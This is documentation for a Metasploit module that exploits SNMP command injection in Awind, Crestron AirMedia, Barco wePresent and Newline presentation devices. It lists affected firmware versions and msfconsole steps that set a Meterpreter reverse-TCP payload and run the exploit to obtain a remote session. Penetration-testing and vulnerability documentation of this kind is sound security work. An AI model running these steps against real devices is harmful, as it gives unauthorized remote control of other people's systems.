Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/linux/snmp/awind_snmp_exec.md
Views: 11789
Vulnerable Application
This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh
system command, leading to command injection.
Note: a valid SNMP read-write community is required to exploit this vulnerability.
The following devices are known to be affected by this issue:
Crestron Airmedia AM-100 <= version 1.5.0.4
Crestron Airmedia AM-101 <= version 2.5.0.12
Awind WiPG-1600w <= version 2.0.1.8
Awind WiPG-2000d <= version 2.1.6.2
Barco wePresent 2000 <= version 2.1.5.7
Newline Trucast 2 <= version 2.1.0.5
Newline Trucast 3 <= version 2.1.3.7
Other devices might be affected by the same issue but lack of access to firmware forbids me from confirming that. See https://github.com/QKaiser/awind-research for full list of similar devices.
Verification Steps
Start
msfconsole
Do:
use exploit/linux/snmp/awind_snmp_exec
Do:
set payload linux/armle/meterpreter/reverse_tcp
Do:
set RHOST [IP]
Do:
set LHOST [IP]
Do:
run
You should get a session.